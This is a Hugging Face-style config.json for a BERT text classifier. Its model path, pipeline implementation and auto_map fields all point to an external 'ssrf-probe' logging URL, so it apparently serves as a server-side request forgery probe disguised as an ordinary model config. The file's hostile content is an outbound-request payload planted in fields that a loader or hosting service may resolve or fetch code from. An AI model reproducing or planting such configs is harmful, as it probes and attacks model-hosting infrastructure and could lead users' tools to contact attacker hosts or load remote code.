File size: 769 Bytes
adc22df |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 |
{
"model_type": "bert",
"architectures": [
"BertForSequenceClassification"
],
"tokenizer_class": "BertTokenizer",
"pretrained_model_name_or_path": "https://firstaccount69-ssrf-probe.hf.space/log?ssrf=config_pretrained_path",
"model_name_or_path": "https://firstaccount69-ssrf-probe.hf.space/log?ssrf=config_model_name_path",
"custom_pipelines": {
"text-classification": {
"impl": "https://firstaccount69-ssrf-probe.hf.space/log?ssrf=custom_pipeline_impl",
"pt": [
"BertForSequenceClassification"
],
"tf": []
}
},
"auto_map": {
"AutoModel": "https://firstaccount69-ssrf-probe.hf.space/log?ssrf=auto_map_model",
"AutoConfig": "https://firstaccount69-ssrf-probe.hf.space/log?ssrf=auto_map_config"
}
} |